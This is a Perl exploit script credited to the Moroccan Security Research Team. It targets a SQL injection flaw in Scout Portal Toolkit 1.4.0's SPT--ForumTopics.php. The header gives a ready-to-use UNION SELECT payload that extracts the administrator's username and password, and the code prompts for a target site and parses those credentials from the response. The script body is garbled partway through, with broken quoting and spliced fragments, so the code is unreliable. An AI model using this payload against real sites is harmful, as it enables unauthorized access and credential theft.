#!/usr/bin/perl
#===============================================================
# Scout Portal Toolkit 1.4.0 Remote SQL injection Exploit
# Coded By Simo64
# Moroccan Security Research Team
# Specials thx to :Greetz :
# CiM-Team - CrAsH_oVeR_rIdE - dabdoub - damip - DarkbiteX - drackanz - Iss4m - megamati
# Mourad - Preddy -Rachid - RapYaS - r00tkita - S4mi - secteura - Silitix - tahati - And All Freinds !
#===============================================================
# Details :
# Scout Portal Toolkit 1.4.0 Remote SQL injection Vulnerability
# Website : http://scout.wisc.edu/Projects/SPT/
# Vulnerable File : SPT--ForumTopics.php
# PoC : http://host/path/SPT--ForumTopics.php?forumid=[SQL]
# Exemple :
# This will display admin name and password
# Exploit : http://victime/path/SPT--ForumTopics.php?forumid=-9+UNION+SELECT+null,UserName,UserPassword,33,44,55+FROM+APUsers+WHERE+UserId=1
# The exploit will work regardless of magic_quotes_gpc is set or not
#==============================================================
use LWP::Simple;
print "\n===============================================================";
print "\n= Scout Portal Toolkit <= 1.4.0 Remote SQL injection Exploit =";
print "\n= Discovred & Coded By Simo64 =";
print "\n= Moroccan Security Research Team =";
print "\n===============================================================\n\n";
my($targ,$path,$userid,$xpl,$xpl2,$data,$data2,$email);
print "Enter Traget Exemple: http://site.com/ \nTraget : ";
chomp($targ = ")+11,index($data,"
")-12);
chomp $username;
$password=substr($data,index($data,"")+34,index($data,"